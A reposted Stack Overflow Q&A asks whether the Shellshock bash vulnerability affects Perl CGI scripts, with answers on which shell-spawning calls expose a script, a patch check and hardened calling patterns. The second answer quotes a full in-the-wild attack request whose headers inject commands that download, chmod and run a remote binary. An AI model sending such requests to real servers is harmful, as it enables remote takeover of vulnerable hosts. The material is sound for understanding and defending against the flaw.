The bash vulnerability CVE-2014-6271 . Can it affect my CGI perl scripts? How to understand this?

Submitted by a 夏天 on 2019-12-22 01:40:49

Question


Yesterday the problem CVE-2014-6271 was reported, which is the BASH Shellshock vulnerability. I am trying to understand if it can affect my server via my Perl CGI scripts.

Can my code be affected in a malicious way - what would my code need to do to be affected? What should I check to verify this?


Answer 1:


Yes, it affects Perl if your CGI script spawns subshells, e.g., using the system() or open() functions or backticks. See this excellent Red Hat blog post. Note that the blog post is not Red Hat specific in any significant way.

Check your Perl CGI scripts for these functions, BUT FIRST UPGRADE BASH TO A FIXED VERSION!
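The exposure described in this answer, as an added example that is not part of the original post: under CGI every request header is exported to the script as an HTTP_* environment variable, so a single-string system() (which goes through /bin/sh) hands those attacker-controlled values to a shell. The bash probe mirrors the check published in the Red Hat advisory, the HTTP_USER_AGENT value is a constructed sample, and bash_is_patched, list_dir_unsafe and list_dir_safe are hypothetical names.

```perl
#!/usr/bin/perl
# Added example (not from the original post): why a Perl CGI script is exposed
# to CVE-2014-6271 only when it lets a shell see request-derived environment
# variables, plus the local check and the hardened calling pattern.
use strict;
use warnings;

# 1. Check the installed bash the way the Red Hat advisory does: a patched
#    bash stops after the function body and never runs the trailing command.
sub bash_is_patched {
    local $ENV{SHELLSHOCK_PROBE} = '() { :;}; echo vulnerable';
    my $out = `bash -c 'echo probe' 2>/dev/null` // '';
    return $out !~ /vulnerable/;
}

# 2. Under CGI the web server sets e.g. $ENV{HTTP_USER_AGENT} from the
#    User-Agent header. Simulate that here with a constructed, harmless value.
$ENV{HTTP_USER_AGENT} = 'Mozilla/5.0 (constructed sample)';

# Vulnerable pattern: a single-string system() is run via /bin/sh (bash on
# many hosts), and that shell inherits every HTTP_* variable unchanged.
sub list_dir_unsafe {
    my ($dir) = @_;
    return system("ls -l $dir");    # shell parses the string and the env
}

# Hardened pattern: replace the environment with an explicit whitelist and use
# list-form system(), which execs the program directly with no shell between.
# Scrubbing the env also protects any child that later spawns a shell itself.
sub list_dir_safe {
    my ($dir) = @_;
    local %ENV = (PATH => '/usr/bin:/bin', LANG => 'C');
    return system('ls', '-l', '--', $dir);
}

print bash_is_patched() ? "bash: patched\n"
                        : "bash: VULNERABLE, upgrade before anything else\n";
list_dir_safe('/tmp');
```

Run this on the web host itself, since it is that machine's /bin/sh and bash that matter, not the developer workstation's.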




Answer 2:


You could try to send specially crafted strings to the HTTP server as the Referer, Cookie, Host or Accept header, which are then passed to (bash) CGI scripts:

GET./.HTTP/1.0 .User-Agent:.Thanks-Rob .Cookie:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh; .Host:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh; .Referer:().{.:;.};.wget.-O./tmp/besh.http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh; .Accept:./

See https://gist.github.com/anonymous/929d622f3b36b00c0be1 as a real world example of malware which was seen in the wild.

If your Perl scripts do not call bash (by using system or open), you should be safe.

See https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/



Source: https://stackoverflow.com/questions/26038053/the-bash-vulnerability-cve-2014-6271-can-it-affect-my-cgi-perl-scripts-how-to
